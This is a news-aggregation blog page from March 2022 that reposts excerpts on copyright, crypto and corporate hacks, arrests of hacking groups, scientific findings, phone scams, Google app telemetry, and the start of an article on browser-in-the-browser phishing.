Copyright Is Indispensable For Artists, They Say; But For All Artists, Or Just Certain Kinds?

Posted on March 30, 2022 by Robin Edgar

One of the central “justifications” for copyright is that it is indispensable if creativity is to be viable. Without it, we are assured, artists would starve. This ignores the fact that artists created and thrived for thousands of years before the 1710 Statute of Anne. But leaving that historical detail aside, as well as the larger question of the claimed indispensability of copyright, a separate issue is whether copyright is a good fit for all creativity, or whether it has inherent biases that few like to talk about.

One person who does talk about them is Kevin J. Greene, John J. Schumacher Chair Professor of Law at Southwestern Law School in Los Angeles. In his 2008 paper “‘Copynorms,’ Black Cultural Production, and the Debate Over African-American Reparations” he writes:

To paraphrase Pink Floyd, there’s a dark sarcasm in the stance of the entertainment industry regarding “copynorms” [respect for copyright]. Indeed, the “copynorms” rhetoric the entertainment industry espouses shows particular irony in light of its long history of piracy of the works of African-American artists, such as blues artists and composers.

In another analysis, Greene points out that several aspects of copyright are a poor fit for the way many artists create. For example:

The [US] Copyright Act requires that “a work of authorship must be “fixed in any tangible medium of expression, now known or later developed, from which [it] can be perceived, reproduced, or otherwise communicated, either directly or indirectly with the aid of a machine or device.” Although “race-neutral”, the fixation requirement has not served the ways Black artists create: “a key component of black cultural production is improvisation.” As a result, fixation deeply disadvantages African-American modes of cultural production, which are derived from an oral tradition and communal standards.

The same is true for much creativity outside the Western nations that invented the idea of copyright, and then proceeded to impose its norms on other nations, not least through trade agreements. Greene’s observation suggests that copyright is far from universally applicable, and may just be a reflection of certain cultural and historical biases. When people talk airily about how copyright is needed to support artists, it is important to ask them to specify which artists, and to examine then whether copyright really is such a good fit for their particular kind of creativity.

Source: Copyright Is Indispensable For Artists, They Say; But For All Artists, Or Just Certain Kinds? | Techdirt

Pokémon-Like NFT Game Axie Infinity Scammed Out Of $600 Million

Posted on March 30, 2022 by Robin Edgar

Pokémon-style NFT battler Axie Infinity was one of the biggest “success” stories in the world of crypto gaming. Now it’s responsible for one of the biggest thefts in the history of the technology. The gaming-focused blockchain Ronin Network announced earlier today that an Axie Infinity exploit allowed a hacker to “drain” roughly $600 million worth of crypto currency from the network.

“There has been a security breach on the Ronin Network,” the company announced on its Substack. “Earlier today, we discovered that on March 23rd, Sky Mavis’s Ronin validator nodes and Axie DAO validator nodes were compromised resulting in 173,600 Ethereum and 25.5M USDC drained from the Ronin bridge in two transactions.”

The person responsible allegedly used hacked private keys to order the fraudulent withdrawals. How, you ask? According to Ronin, “the attacker found a backdoor through our gas-free RPC node, which they abused to get the signature for the Axie DAO validator.”

Basically, the Ronin “side-chain” for games like Axie Infinity uses “9 validator nodes” to prevent fraudulent transactions. However, in November, due to overwhelming demand by new Axie players, Ronin gave special privileges to Sky Mavis, the company behind the game, so it could sign transactions on its behalf.

[…]

“The Axie DAO allowlisted Sky Mavis to sign various transactions on its behalf,” Ronin writes. “This was discontinued in December 2021, but the allowlist access was not revoked. Once the attacker got access to Sky Mavis systems they were able to get the signature from the Axie DAO validator by using the gas-free RPC.“

Ronin has apparently locked down accounts while it continues its investigation into the hack, meaning no one can get their funds out even as the price of RON, the network’s native token, has reportedly plummeted more than 25%.

[…]

Source: Pokémon-Like NFT Game Axie Infinity Scammed Out Of $600 Million

GameStop, AMC Stocks Halted On NYSE after reaching above $500,- per share

Posted on March 29, 2022 by Robin Edgar

GameStop (GME) – Get GameStop Corp. Class A Report shares extended declines Tuesday, after being halted by officials on the New York Stock Exchange, in a move that could snap the meme stock’s longest winning streak in more than a decade.

Both GameStop and AMC Entertainment (AMC) – Get AMC Entertainment Holdings, Inc. Class A Report names that defined last year’s meme-stock phenomenon, were halted in early Tuesday trading amid heighted volatility and larger-than-usual pre-market volumes.

GameStop was last seen trading 6.1% lower on the session at $178.00 each, a move that would still leave the stock up 41% over the past month, while AMC fell as much as 12% before trading 2.1% into the red at $28.80 each.

Last week, Securities and Exchange Commission filings late Tuesday showed that Cohen’s RC Ventures LLC, which has also built stakes in Bed Bath & Beyond BBBY, now owns around 9.1 million GameStop shares representing an 11.9% overall stake in the Grapevine, Texas-based group.

Short interest in the shares remains elevated, however, with data from S3 Partners showing just under $1.2 billion in bets against the group, a figure that represents around 12.66 million shares, or 20.1% of the stock’s outstanding float.

GameStop reported a wider-than-expected loss of $1.86 per share for its fiscal fourth quarter last week, and managed to record negative free cash flow of $131.6 million even as revenues rose 6.2% to $2.25 billion.

Source: GameStop Stock Halted On NYSE, Extends Slide As Trading Resumes – TheStreet

Oddly enough this article talks it down but a quick look at the chart shows astronomic growth on both stocks. Superstonk is going nuts on Reddit.

New method for making tissue transparent could speed the study of many diseases

Posted on March 29, 2022 by Robin Edgar

Scientists at Scripps Research have unveiled a new tissue-clearing method for rendering large biological samples transparent. The method makes it easier than ever for scientists to visualize and study healthy and disease-related biological processes occurring across multiple organ systems.

Described in a paper in Nature Methods on March 28, 2022, and dubbed HYBRiD, the new method combines elements of the two main prior approaches to tissue-clearing technology, and should be more practical and scalable than either for large-sample applications.

[…]

Tissue-clearing involves the use of solvents to remove molecules that make tissue opaque (such as fat), rendering the tissue optically transparent—while keeping most proteins and structures in place. Scientists commonly use genetically encoded or antibody-linked fluorescent beacons to mark active genes or other molecules of interest in a lab animal, and tissue-clearing in principle allows these beacons to be imaged all at once across the entire animal.

[…]

00:15

-00:27

Learn how a new Scripps Research technique makes it easier to analyze body-wide biological processes and diseases such as COVID-19 infection. Credit: Scripps Research

The new method devised by Ye and his team uses a sequential combination of organic solvents and water-based detergents, and makes use of water-based hydrogels to protect those molecules within the tissue that need to be preserved. It often does not require the pumping of solvents through the sample.

“In many cases, you can just put the whole thing in a jar and keep it in a shaker on your benchtop until it’s done,” says co-first author Victoria Nudell, a research assistant in the Ye lab. “This makes it practical and scalable enough for routine use.”

The researchers demonstrated the ease and utility of their new method in a variety of applications. These included a collaboration with the laboratory of John Teijaro, Ph.D., associate professor of immunology and microbiology, to image SARS-CoV-2-infected cells in the whole chests of mice for the first time—a procedure whose simplicity, with the new method, enabled it to be done in a high-level biosafety facility where access to equipment is strictly limited.

[…]

Source: New method for making tissue transparent could speed the study of many diseases

Global science project links Android phones with satellites to improve weather forecasts

Posted on March 29, 2022 by Robin Edgar

Collecting satellite data for research is a group effort thanks to this app developed for Android users. Camaliot is a campaign funded by the European Space Agency, and its first project focuses on making smartphone owners around the world part of a project that can help improve weather forecasts by using your phone’s GPS receiver.

The Camaliot app works on devices running Android version 7.0 or later that support satellite navigation.

[…]

Researchers think that they can use satellite signals to get more information about the atmosphere. For example, the amount of water vapor in the atmosphere can affect how a satellite signal travels through the air to something like a phone.

The app gathers information to track signal strength, the distance between the satellite and the phone being used, and the satellite’s carrier phase, according to Camaliot’s FAQs. With enough data collected from around the world, researchers can theoretically combine that with existing weather readings to measure long-term water vapor trends. They hope to use that data to inform weather forecasting models with machine learning. They can also track changes in Earth’s ionosphere — the part of the atmosphere near space. Creating better ionospheric forecasts could be relevant in tracking space weather and could eventually make Global Navigation Satellite Systems (GNSS) more accurate by accounting for events like geomagnetic storms.

[…]

Here’s how you can begin using the Camaliot app on your Android phone after downloading it from Google Play:

Select “start logging” and place your phone in an area with a clear sky view to begin logging the data

Once you have measured to your liking, select “stop logging”

Then, upload your session to the server and repeat the process over time to collect more data. You can also delete your locally-stored log files at this step.

In addition to being able to view your own measurements against others accumulated over time, you can also see a leaderboard showing logging sessions done by other participants. Eventually, the information collected for the study will be available in a separate portal.

For registered users, their password, username, email address, and number of measurements will be stored in Camaliot’s database, but they won’t be used in post-study publications and products, according to Camaliot’s privacy policy. Specifically, Camaliot says that the need for extensive personal data is for scientific purposes and environmental monitoring and that its need for processing data is “necessary for the performance of a task carried out in the public interest, namely for the conduction of this scientific study.”

[…]

Source: Global science project links Android phones with satellites to improve weather forecasts – The Verge

Unprecedented videos show RNA switching ‘on’ and ‘off’

Posted on March 28, 2022 by Robin Edgar

Similar to a light switch, RNA switches (called riboswitches) determine which genes turn “on” and “off.” Although this may seem like a simple process, the inner workings of these switches have confounded biologists for decades.

Now researchers led by Northwestern University and the University at Albany discovered one part of RNA smoothly invades and displaces another part of the same RNA, enabling the structure to rapidly and dramatically change shape. Called “strand displacement,” this mechanism appears to switch genetic expression from “on” to “off.”

Using a simulation they launched last year, the researchers made this discovery by watching a slow-motion simulation of a riboswitch up close and in action. Affectionately called R2D2 (short for “reconstructing RNA dynamics from data”), the new simulation models RNA in three dimensions as it binds to a compound, communicates along its length and folds to turn a gene “on” or “off.”

[…]

“We have found this strand displacement mechanism occurring in other types of RNA molecules, indicating this might be a potential generality of RNA folding,” said Northwestern’s Julius B. Lucks, who co-led the study. “We are starting to find similarities among different types of RNA molecules, which could eventually lead to RNA design rules for folding and function.”

[…]

Although RNA folding takes place in the human body more than 10 quadrillion times per second—every time a gene is expressed in a cell—researchers know very little about the process. To help visualize and understand the mysterious yet crucial process, Lucks and Chen unveiled R2D2 last year, in a paper published in the journal Molecular Cell.

Credit: Northwestern University

Employing a technology platform developed in Lucks’ lab, R2D2 captures data related to RNA folding as the RNA is being made. Then, it uses computational tools to mine and organize the data, revealing points where the RNA folds and what happens after it folds. Angela Yu, a former student of Lucks, inputted this data into computer models to generate accurate videos of the folding process.

“What’s so groundbreaking about the R2D2 approach…is that it combines experimental data on RNA folding at the nucleotide level with predictive algorithms at the atomic level to simulate RNA folding in ultra-slow motion,” said Dr. Francis Collins, director of the National Institutes of Health, in his February 2021 blog. “While other computer simulations have been available for decades, they have lacked much-needed experimental data of this complex folding process to confirm their mathematical modeling.”

[…]

Source: Unprecedented videos show RNA switching ‘on’ and ‘off’

Chemists cook up way to remove microplastics using okra

Posted on March 27, 2022 by Robin Edgar

Extracts of okra and other slimy plants commonly used in cooking can help remove dangerous microplastics from wastewater, scientists said Tuesday.

The new research was presented at the spring meeting of the American Chemical Society, and offers an alternative to the synthetic chemicals currently used in treatment plants that can themselves pose risks to health.

“In order to go ahead and remove microplastic or any other type of materials, we should be using natural materials which are non-toxic,” lead investigator Rajani Srinivasan, of Tarleton State University, said in an explainer video.

[…]

Srinivasan’s past research had examined how the goo from okra and other plants could remove textile-based pollutants from water and even microorganisms, and she wanted to see if that would equally apply to microplastics.

[…]

Typical wastewater treatment removes microplastics in two steps.

First, those that float are skimmed off the top of the water. These however account for only a small fraction, and the rest are removed using flocculants, or sticky chemicals that attract microplastics into larger clumps.

The clumps sink to the bottom and can then be separated from the water.

The problem is that these synthetic flocculants, such as polyacrylamide, can break down into toxic chemicals.

[…]

They tested chains of carbohydrates, known as polysaccharides, from the individual plants, as well as in combination, on various microplastic-contaminated water, examining before and after microscopic images to determine how many particles had been removed.

They found that polysaccharides from okra paired with those from fenugreek could best remove microplastics from ocean water, while polysaccharides from okra paired with tamarind worked best in freshwater samples.

Overall, the plant-based polysaccharides worked just as well or better than polyacrylamide. Crucially, the plant-based chemicals are both non-toxic and can be used in existing treatment plants.

[…]

Source: Chemists cook up way to remove microplastics using okra

Finally, A Mapping Tool For Addressable LED Strings

Posted on March 25, 2022 by Robin Edgar

Addressable LED strings have made it easier than ever to build fun glowable projects with all kinds of exciting animations. However, if you’re not going with a simple grid layout, it can be a little difficult to map your strings out in code. Fear not, for [Jason Coon] has provided a tool to help out with just that!

[Jason]’s web app, accessible here. is used for mapping out irregular layouts when working with addressable LED strings like the WS2812B and others that work with libraries like FastLED and Pixelblaze. If you’re making some kind of LED globe, crazy LED tree, or other non-gridular shape, this tool can help.

The first step is to create a layout of your LEDs in a Google Sheets table, which can then be pasted into the web app. Then, the app handles generating the necessary code to address the LEDs in an order corresponding to the physical layout.

[Jason] does a great job of explaining how the tool works, and demonstrates it working with a bowtie-like serpentine layout with rainbow animations. The tool can even provide visual previews of the layout so you can verify what you’ve typed in makes sense.

It’s a great tool that we recently saw put to use on [Geeky Faye’s] excellent necklace project. Video after the break.

P

Source: Finally, A Mapping Tool For Addressable LED Strings | Hackaday

NeRF Research Turns a few dozen 2D Photos Into 3D Scenes really quickly

Posted on March 25, 2022 by Robin Edgar

[…] Known as inverse rendering, the process uses AI to approximate how light behaves in the real world, enabling researchers to reconstruct a 3D scene from a handful of 2D images taken at different angles. The NVIDIA Research team has developed an approach that accomplishes this task almost instantly — making it one of the first models of its kind to combine ultra-fast neural network training and rapid rendering.

NVIDIA applied this approach to a popular new technology called neural radiance fields, or NeRF.

[…]

“If traditional 3D representations like polygonal meshes are akin to vector images, NeRFs are like bitmap images: they densely capture the way light radiates from an object or within a scene,”

[…]

Showcased in a session at NVIDIA GTC this week, Instant NeRF could be used to create avatars or scenes for virtual worlds, to capture video conference participants and their environments in 3D, or to reconstruct scenes for 3D digital maps.

[…]

Collecting data to feed a NeRF is a bit like being a red carpet photographer trying to capture a celebrity’s outfit from every angle — the neural network requires a few dozen images taken from multiple positions around the scene, as well as the camera position of each of those shots.

[…]

Instant NeRF, however, cuts rendering time by several orders of magnitude. It relies on a technique developed by NVIDIA called multi-resolution hash grid encoding, which is optimized to run efficiently on NVIDIA GPUs. Using a new input encoding method, researchers can achieve high-quality results using a tiny neural network that runs rapidly.

The model was developed using the NVIDIA CUDA Toolkit and the Tiny CUDA Neural Networks library. Since it’s a lightweight neural network, it can be trained and run on a single NVIDIA GPU — running fastest on cards with NVIDIA Tensor Cores.

The technology could be used to train robots and self-driving cars to understand the size and shape of real-world objects by capturing 2D images or video footage of them. It could also be used in architecture and entertainment to rapidly generate digital representations of real environments that creators can modify and build on.

[…]

Source: NeRF Research Turns 2D Photos Into 3D Scenes | NVIDIA Blog

Justice Department indicts four Russian government workers in energy sector hacks

Posted on March 25, 2022 by Robin Edgar

The US Justice Department today announced indictments against four Russian government employees, who it alleges attempted a hacking campaign of the global energy sector that spanned six years and devices in roughly 135 countries. The two indictments were filed under seal last summer, and are finally being disclosed to the public.

The DOJ’s decision to release the documents may be a way to raise public awareness of the increased threat these kinds of hacks pose to US critical infrastructure in the wake of Russia’s invasion of Ukraine. State-sponsored hackers have targeted energy, nuclear, water and critical manufacturing companies for years, aiming to steal information on their control systems. Cybersecurity officials noticed a spike in Russian hacking activity in the US in recent weeks.

“Russian state-sponsored hackers pose a serious and persistent threat to critical infrastructure both in the United States and around the world,” said Deputy Attorney General Lisa O. Monaco in a statement. “Although the criminal charges unsealed today reflect past activity, they make crystal clear the urgent ongoing need for American businesses to harden their defenses and remain vigilant.

The indictments allege that two separate campaigns occurred between 2012 and 2018. The first one, filed in June 2021, involves Evgeny Viktorovich Gladkikh, a computer programmer at the Russian Ministry of Defense. It alleges that Gladkik and a team of co-conspirators were members of the Triton malware hacking group, which launched a failed campaign to bomb a Saudi petrochemical plant in 2017. As TechCrunch noted, the Saudi plant would have been completely decimated if not for a bug in the code. In 2018, the same group attempted to hack US power plants but failed.

The second indictment charges three hackers who work for Russia’s intelligence agency, the Federal Security Service (FSB), as being the members of the hacking group Dragonfly, which coordinated multiple attacks on nuclear power plants, energy companies, and other critical infrastructure. It alleges that the three men, Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov engaged in multiple computer intrusions between 2012 and 2017. The DOJ estimates that the three hackers were able to install malware on more than 17,000 unique devices in the US and abroad.

A second phase known as Dragonfly 2.0, which occurred between 2014 and 2017, targeted more than 3,300 users across 500 different energy companies in the US and abroad. According to the DOJ, the conspirators were looking to access the software and hardware in power plants that would allow the Russian government to trigger a shutdown.

The US government is still looking for the three FSB hackers. The State Department today announced a $10 million award for any information on their whereabouts. However, as the Washington Post notes, the US and Russia do not have an extradition treaty, so the likeliness of any of the alleged hackers being brought to trial by these indictments is slim.

Source: Justice Department indicts four Russian government workers in energy sector hacks | Engadget

Scientists find microplastics in blood for first time

Posted on March 25, 2022 by Robin Edgar

Scientists have discovered microplastics in human blood for the first time, warning that the ubiquitous particles could also be making their way into organs.

The tiny pieces of mostly invisible plastic have already been found almost everywhere else on Earth, from the deepest oceans to the highest mountains as well as in the air, soil and food chain.

A Dutch study published in the Environment International journal on Thursday examined blood samples from 22 anonymous, healthy volunteers and found microplastics in nearly 80 percent of them.

Half of the blood samples showed traces of PET plastic, widely used to make drink bottles, while more than a third had polystyrene, used for disposable food containers and many other products.

[…]

“Where is it going in your body? Can it be eliminated? Excreted? Or is it retained in certain organs, accumulating maybe, or is it even able to pass the blood-brain barrier?”

The study said the microplastics could have entered the body by many routes: via air, water or food, but also in products such as particular toothpastes, lip glosses and tattoo ink.

[…]

Source: Scientists find microplastics in blood for first time

HP staffer blew $5m on personal expenses with company card

Posted on March 25, 2022 by Robin Edgar

A now-former HP finance planning manager pleaded guilty on Wednesday to charges of wire fraud, money laundering, and filing false tax returns that follow from the misappropriation of company funds.

According to the US Justice Department, Shelbee Szeto, 30, of Fremont, California, worked at HP Inc from August 2017 through June 2021, first as an executive assistant and then as a finance planning manager.

During that time, she was responsible for paying HP vendors

[…]

Szeto was issued multiple PCards and, according to prosecutors, she devised a scheme to make purported vendor payments to financial accounts that she controlled and then used HP’s funds to purchase goods for herself.

“Between approximately April 24, 2018 and April 23, 2021, Szeto knowingly charged approximately $4.8 million dollars in payments from her HP PCards to PayPal, Square, and Stripe merchant accounts under her control and for her personal benefit,” the indictment stated.

To make this spending appear legitimate, Szeto submitted false invoices to HP.

[…]

Szeto managed to make several transactions in the $30,000 to $40,000 range; Square declined to process a payment for $330,000. Asked for supporting paperwork by the payment processor, she is said to have provided false documentation and to have falsely told Square investigators the funds were for marketing work related to a real-estate transaction.

Her bank, First Republic, also questioned the source of her funds, according to the indictment, and the IRS noticed that her 2019 and 2020 tax forms were inaccurate. All told, Szeto is said to have cost HP $5.2m.

The Justice Department said Szeto spent the funds on: a 2020 Tesla sedan; a 2021 Porsche SUV; various bags and purses from Chanel, Dior, Gucci, and Hermes; and an assortment jewelry including necklaces, rings, pendants, and wristwatches from Audemars Piguet, Bulgari, Cartier, and Rolex.

[…]

Source: HP staffer blew $5m on personal expenses with company card • The Register

British cops arrest seven < 21 yr kids in Lapsus$ crime gang probe after they break into and dox the tech giants

Posted on March 25, 2022 by Robin Edgar

British cops investigating a cyber-crime group have made a string of arrests.

Though City of London Police gave few details on Thursday, officers are said to be probing the notorious extortionware gang Lapsus$, and have detained and released seven people aged 16 to 21.

In a statement, the force said: “Seven people between the ages of 16 and 21 have been arrested in connection with an investigation into a hacking group. They have all been released under investigation. Our inquiries remain ongoing.”

Among them is a 16-year-old boy from Oxford who has been accused of being one of the crew’s leaders, the BBC reported. He cannot be identified for legal reasons.

[…]

Bloomberg first reported the boy’s alleged involvement with the extortion gang on Wednesday, and claims by security researchers that he was the crew’s mastermind. Lapsus$ is the devil-may-care team of miscreants that have broken into major firms including Microsoft, Samsung, Vodafone, and Okta.

It is said the boy netted about $14m in Bitcoin from his online life, and was lately doxxed – which means he had his personal info leaked online – after an apparent falling out with his business partners.

[…]

The cyber-crime ring rose to fame in recent months for its brash tactics and its propensity to brag about its exploits on Telegram. Its standard operating procedure is to infiltrate a big target’s network, steal sensitive internal data, make demands to prevent the public release of this material – and usually release some of it anyway.

[…]

In February, however, the criminals sneaked into Nvidia‘s networks and stole one terabyte of data including employee credentials and proprietary information, and dumped some of it online.

Days later Lapsus$ said it had raided Samsung and stole 190GB of internal files including some Galaxy device source code.

The criminal group followed that up by claiming it was responsible for a cybersecurity incident at gaming giant Ubisoft.

‘Motivated by theft and destruction’

Microsoft, in its days-late confirmation that Lapsus$, which the Windows giant calls DEV-0537, did indeed steal some of its source code, and said the crime group seems to be “motivated by theft and destruction.”

[…]

Source: British cops arrest seven in Lapsus$ crime gang probe • The Register

Owners Of ‘Gran Turismo 7’ Locked Out Of Single Player Game When Online DRM Servers Go Down – when you don’t own the game you bought

Posted on March 25, 2022 by Robin Edgar

When someone asks me what DRM is, my answer is very simple: it’s anti-piracy software that generally doesn’t stop pirates at all, and, instead, mostly only annoys legitimate buyers. Well, then why do software and video game companies use it at all? Couldn’t tell you. Businesses really want to annoy their own customers? Apparently, yes. Timothy, when you say this doesn’t really stop pirates, you’re exaggerating, right? No, not at all.

The worst of the examples of legit customers getting screwed by video game DRM involve when a game or product is bricked simply because a publisher or its DRM partner simply shuts down the servers that make the DRM work, on purpose or otherwise.

Gran Turismo 7 was recently released on the PlayStation and is already facing major headwinds due to the public’s absolute hate for all the microtransactions included in the game. On top of that, the entire game, including the single player content, was rendered unplayable because the DRM servers that require an online check to play the game crumbled during a maintenance window.

The scheduled server maintenance, timed around the release of the version 1.07 patch for the game, was initially planned to last just two hours starting at 6 am GMT (2 am Eastern) on Thursday morning. Six hours later, though, the official Gran Turismo Twitter account announced that “due to an issue found in Update 1.07, we will be extending the Server Maintenance period. We will notify everyone as soon as possible when this is likely to be completed. We apologize for this inconvenience and ask for your patience while we work to resolve the issue.”

“Inconvenience” in this case means not being able to play the game the customer purchased. Like, basically at all. Why the single player content in a console game of all things should require an online check-in is completely beyond me.

[…]

Source: Owners Of ‘Gran Turismo 7’ Locked Out Of Single Player Game When Online DRM Servers Go Down | Techdirt

EU, US strike preliminary deal to unlock transatlantic data flows – yup, the EU will let the US spy on it’s citizens freely again

Posted on March 25, 2022 by Robin Edgar

Negotiators have been working on an agreement — which allows Europeans’ personal data to flow to the United States — since the EU’s top court struck down the Privacy Shield agreement in July 2020 because of fears that the data was not safe from access by American agencies once transferred across the Atlantic.

The EU chief’s comments Friday show both sides have reached a political breakthrough, coinciding with U.S. President Joe Biden’s visit to Brussels this week.

“I am pleased that we found an agreement in principle on a new framework for transatlantic data flows. This will enable predictable and trustworthy data flows between the EU and U.S., safeguarding privacy and civil liberties,” she said.

Biden said the framework would allow the EU “to once again authorize transatlantic data flows that help facilitate $7.1 trillion in economic relationships.”

Friday’s announcement will come as a relief to the hundreds of companies that had faced mounting legal uncertainty over how to shuttle everything from payroll information to social media post data to the U.S.

Officials on both sides of the Atlantic had been struggling to bridge an impasse over what it means to give Europeans’ effective legal redress against surveillance by U.S. authorities. Not all of those issues have been resolved, though von der Leyen’s comments Friday suggest technical solutions are within reach.

Despite the ripples of relief Friday’s announcement will send through the business community, any deal is likely to be challenged in the courts by privacy campaigners.

Source: EU, US strike preliminary deal to unlock transatlantic data flows – POLITICO

Virtual Kidnappers Are Scamming Parents Out of Millions of Dollars

Posted on March 22, 2022 by Robin Edgar

[…]

cases have become so widespread that the bureau has a name for them: virtual kidnappings. “It’s a telephone extortion scheme,” says Arbuthnot, who heads up virtual-kidnapping investigations for the FBI out of Los Angeles. Because many of the crimes go unreported, the bureau doesn’t have a precise number on how widespread the scam is. But over the past few years, thousands of families like the Mendelsteins have experienced the same bizarre nightmare: a phone call, a screaming child, a demand for ransom money, and a kidnapping that — after painful minutes, hours, or even days — is revealed to be fake.

[…]

Valerie Sobel, a Beverly Hills resident who runs a charitable foundation, also received a call from a man who told her he had kidnapped her daughter. “We have your daughter’s finger,” he said. “Do you want the rest of her in a body bag?” As proof, the kidnapper said, he was putting her daughter on the phone. “Mom! Mom!” she heard her daughter cry. “Please help — I’m in big trouble!” Like Mendelstein, Sobel was told not to take any other calls. After getting the ransom money from her bank, she was directed to a MoneyGram facility, where she wired the cash to the kidnappers — only to discover that her daughter had never been abducted.

The cases weren’t just terrifying the victims; they were also rattling police officers, who found themselves scrambling to stop kidnappings that weren’t real. “They’re jumping fences, they’re breaking down doors to rescue people,” Arbuthnot tells me. The calls were so convincing that they even duped some in law enforcement.

[…]

I’m listening to a recording of a virtual kidnapping that Arbuthnot is playing for me, to demonstrate just how harrowing the calls can be. “It begins with the crying,” he says. “That’s what most people hear first: Help me, help me, help me, Mommy, Mommy, Daddy.”

Virtual kidnapping calls, like any other telemarketing pitch, are essentially a numbers game. “It’s literally cold-calling,” Arbuthnot tells me. “We’ll see 100 phone calls that are total failures, and then we’ll see a completely successful call. And all you need is one, right?”

The criminals start with a selected area code and then methodically work their way through the possible nine-digit combinations of local phone numbers. Not surprisingly, the first area where the police noticed a rash of calls was 310 — Beverly Hills. But it’s not enough to just get a potential mark to pick up. Virtual kidnapping is a form of hypnosis: The kidnappers need you to fall under their spell. In hacker parlance, they’re “social engineers,” dispassionately rewiring your reactions by psychologically manipulating you. That’s why they start with an emotional gut punch that’s almost impossible to ignore: a recording of a child crying for help.

The recordings are generic productions, designed to ensnare as many victims as possible. “They’re not that sophisticated,” Arbuthnot tells me. It’s a relatively simple process: The criminals get a young woman they know to pretend they’ve been kidnapped, and record their hysterical pleas. From there, the scheme follows one of two paths. Either you don’t have a kid, or suspect something is amiss, and hang up. Or, like many parents, you immediately panic at the sound of a terrified child.

Before you can form a rational thought, you blurt out your kid’s name, if only to make sense of what you’re hearing. Lisa? you say. Is that you? What’s wrong?

At that point, you’ve sealed your fate. Never mind that the screams you’re hearing aren’t those of your own kid. In a split second, you’ve not only bought into the con, but you’ve also given the kidnappers the one thing they need to make it stick. “We’ve kidnapped Lisa,” they tell you — and with that, your fear takes over. Adrenaline floods your bloodstream, your heart rate soars, your breath quickens, and your blood sugar spikes. No matter how skeptical or street-savvy you consider yourself, they’ve got you.

[…]

The other elements of virtual kidnappings are taken straight from the playbook for classic cons. Don’t give the mark time to think. Don’t let them talk to anyone else. Get them to withdraw an amount of cash they can get their hands on right away, and wire it somewhere untraceable. Convince them a single deviation from your instructions will cost them dearly.

[…]

the most innovative aspect of the scheme was the kidnapping calls: They were made from inside the prison in Mexico City, where Ramirez was serving time. “Who has time seven days a week, 12 hours a day, to make phone calls to the US, over and over and over, with a terrible success rate?” Arbuthnot says. “Prisoners. That was a really big moment for us. When we realized what was happening, it all made sense.”

[…]

there’s an obvious problem: Ramirez and Zuniga are already incarcerated, as the feds suspect is the case with almost every other virtual kidnapper who is still cold-calling potential victims. Which raises the question: How do you stop a crime that’s being committed by criminals you’ve already caught?

“What are we going to do?” Arbuthnot says. “We’re going to put these people in jail? They’re already in jail.”

[…]

Source: Virtual Kidnappers Are Scamming Parents Out of Millions of Dollars

Apple Maps, Music, iMessage, App Store, and iCloud Are Down

Posted on March 22, 2022 by Robin Edgar

Apple’s services came back online in the late afternoon. Apple’s system status page shows that all of the services that had previously been listed as “down” are now back in the green. It’s still unclear what happened exactly, and Apple never returned Gizmodo’s email for comment on the situation.

Apple is experiencing massive technical difficulties, and widespread reports of outages for its various services are flooding the internet.

The company’s own status page shows that several of its most popular products aren’t working. Multiple reports—including from Down Detector, which tracks website and app outages—have shown that users of iCloud, Apple Music, the App Store, iTunes, Apple TV, iMessage, Mail, Contacts, Find My, Apple Maps, FaceTime, Apple Fitness+, and even our beloved domestic helper Siri all appear to be having major problems. Additionally, Bloomberg reports that Apple’s internal systems, both for its corporate offices and its Apple Store retail locations, are down as well. The company reportedly sent internal messages notifying employees, who had difficulty working from home, that domain name system (DNS) problems led to the outage. The full extent of these outages and the regions they are affecting is unclear.

[…]

Source: Apple Maps, Music, iMessage, App Store, and iCloud Are Down

Edit: Websiteplanet has another tool to detect if a website is down or not

Messages, Dialer apps sent text, call info to Google

Posted on March 22, 2022 by Robin Edgar

Google’s Messages and Dialer apps for Android devices have been collecting and sending data to Google without specific notice and consent, and without offering the opportunity to opt-out, potentially in violation of Europe’s data protection law.

According to a research paper, “What Data Do The Google Dialer and Messages Apps On Android Send to Google?” [PDF], by Trinity College Dublin computer science professor Douglas Leith, Google Messages (for text messaging) and Google Dialer (for phone calls) have been sending data about user communications to the Google Play Services Clearcut logger service and to Google’s Firebase Analytics service.

“The data sent by Google Messages includes a hash of the message text, allowing linking of sender and receiver in a message exchange,” the paper says. “The data sent by Google Dialer includes the call time and duration, again allowing linking of the two handsets engaged in a phone call. Phone numbers are also sent to Google.”

The timing and duration of other user interactions with these apps has also been transmitted to Google. And Google offers no way to opt-out of this data collection.

[…]

From the Messages app, Google takes the message content and a timestamp, generates a SHA256 hash, which is the output of an algorithm that maps the human readable content to an alphanumeric digest, and then transmits a portion of the hash, specifically a truncated 128-bit value, to Google’s Clearcut logger and Firebase Analytics.

Hashes are designed to be difficult to reverse, but in the case of short messages, Leith said he believes some of these could be undone to recover some of the message content.

“I’m told by colleagues that yes, in principle this is likely to be possible,” Leith said in an email to The Register today. “The hash includes a hourly timestamp, so it would involve generating hashes for all combinations of timestamps and target messages and comparing these against the observed hash for a match – feasible I think for short messages given modern compute power.”

The Dialer app likewise logs incoming and outgoing calls, along with the time and the call duration.

[…]

The paper describes nine recommendations made by Leith and six changes Google has already made or plans to make to address the concerns raised in the paper. The changes Google has agreed to include:

Revising the app onboarding flow so that users are notified they’re using a Google app and are presented with a link to Google’s consumer privacy policy.

Halting the collection of the sender phone number by the CARRIER_SERVICES log source, of the 5 SIM ICCID, and of a hash of sent/received message text by Google Messages.

Halting the logging of call-related events in Firebase Analytics from both Google Dialer and Messages.

Shifting more telemetry data collection to use the least long-lived identifier available where possible, rather than linking it to a user’s persistent Android ID.

Making it clear when caller ID and spam protection is turned on and how it can be disabled, while also looking at way to use less information or fuzzed information for safety functions.

[…]

Leith said there are two larger matters related to Google Play Service, which is installed on almost all Android phones outside of China.

“The first is that the logging data sent by Google Play Services is tagged with the Google Android ID which can often be linked to a person’s real identity – so the data is not anonymous,” he said. “The second is that we know very little about what data is being sent by Google Play Services, and for what purpose(s). This study is the first to cast some light on that, but it’s very much just the tip of the iceberg.”

Source: Messages, Dialer apps sent text, call info to Google • The Register

Browser In The Browser (BITB) Attack

Posted on March 22, 2022 by Robin Edgar

This article explores a phishing technique that simulates a browser window within the browser to spoof a legitimate domain.

Introduction

For security professionals, the URL is usually the most trusted aspect of a domain. Yes there’s attacks like IDN Homograph and DNS Hijacking that may degrade the reliability of URLs but not to an extent that makes URLs unreliable.

All of this eventually lead me to think, is it possible to make the “Check the URL” advice less reliable? After a week of brainstorming I decided that the answer is yes.

Pop-Up Login Windows

